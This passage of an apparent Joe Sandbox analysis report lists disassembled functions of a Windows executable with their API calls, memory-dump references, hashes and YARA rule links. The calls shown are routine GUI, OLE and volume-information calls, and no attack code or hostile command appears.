                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 3401059$3401060$3401061$3401062$<a>%s</a>
                                                                                                                                                                                                                                                                                    • API String ID: 0-135031447
                                                                                                                                                                                                                                                                                    • Opcode ID: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                    • Instruction ID: 570f8eb3785bc855bef0c474daa2501289258084391a13b0a6423d05570a55ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D81D7717543005BC714EF218C42BDA33A4AF88714F14853FBA0D6B2C6DBB9E985879E
                                                                                                                                                                                                                                                                                    Function 004653B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004012D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00497DC0), ref: 00401305
                                                                                                                                                                                                                                                                                      • Part of subcall function 004012D0: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,?,?,?,00497DC0), ref: 00401316
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                      • Part of subcall function 004650D0: ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00465580
                                                                                                                                                                                                                                                                                    • SetRect.USER32 ref: 004655DE
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000005,00000000,00000005,00000000), ref: 004655ED
                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(0000000E,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,Arial), ref: 00465611
                                                                                                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,00000005,00000000,00000005,00000000,?,00000000), ref: 00465655
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$CriticalRectSection$ColorCreateEnterFontGdiplusLeaveReleaseStartup
                                                                                                                                                                                                                                                                                    • String ID: 8<$Arial
                                                                                                                                                                                                                                                                                    • API String ID: 3457378621-1936108657
                                                                                                                                                                                                                                                                                    • Opcode ID: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                    • Instruction ID: b865aa364f9357de02ae4fe0840df8cdec7f8c78b7ca9b09445c5b8d1f81986b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED8121B09057889EDB70DF2ACC44BCABBE8BF94714F00011FF8489A2A1DBB55604CF99
                                                                                                                                                                                                                                                                                    Function 00465A50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00465A5F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00465A78
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00465B27
                                                                                                                                                                                                                                                                                    • GetDC.USER32(?), ref: 00465B49
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00465B61
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00465BA5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$ClientMessageParentReleaseSendWindow
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 330964712-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                    • Instruction ID: b1a5f572caf67006923a9ef52c219ce68de25ddbd2c2a7f7615237fc757273c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0510371600B019FD324DF79C889BA7B3E9BF88704F008A1DE5AA97281DB74B854CF59
                                                                                                                                                                                                                                                                                    Function 004549E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 96fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 00454A46
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000), ref: 00454ABC
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090064,00000000,00000000,00000340,00000060,00000003,00000000), ref: 00454AE8
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00454AFA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandleInformationVolume
                                                                                                                                                                                                                                                                                    • String ID: C:\$NTFS$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 1233574911-974996950
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                    • Instruction ID: 7a7ffa21548745985fbbbea45252e330d1802da0f0ea7318edadfa9cc625902c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE311D71608300AFE320CF64D885B6BB7F8AF88714F400A2DF549D7291E7B5E584CB5A
                                                                                                                                                                                                                                                                                    Function 0042D380 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102F,?,00000000), ref: 0042D3DB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D3F8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D411
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D433
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D46C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: Selected$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3404155819
                                                                                                                                                                                                                                                                                    • Opcode ID: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                    • Instruction ID: 47af735872212f4aff9019aaa9f39296bd56d2d945b6e3696df55891068cb05b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521D8757407117BE230EB79ED82F9BA3A4AB48B55F504A1AF705A72C1CAB4F801879C
                                                                                                                                                                                                                                                                                    Function 00420AA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 00420AB8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00000005,00000000), ref: 00420ACA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001207,00000006,?), ref: 00420AE9
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00420AFB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000005), ref: 00420B28
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00420B37
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ClientRect
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 1925248871-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                    • Instruction ID: f6960d58b42149bb48d8704757dd9bea0314272504ba79e98d6d7c5fe9983159
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC115E717403057BE235EA79CC86FA773E9AB88B40F41491CF285EB1C1DAB9F9448B54
                                                                                                                                                                                                                                                                                    Function 00453220 Relevance: 12.3, APIs: 8, Instructions: 266memoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00453297
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00453332
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004533BF
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004533E6
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 004534A6
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004534B7
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004534BE
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004534C5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearString$FreeInit$Alloc
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1906771560-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                    • Instruction ID: 04dbbea40edafa167825a5640816ee55d2e105094fff44b6784cacd96e044d36
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47B136716083409FC310DF69C884A1BFBE9BFC9714F24895EE99887362D774E949CB92
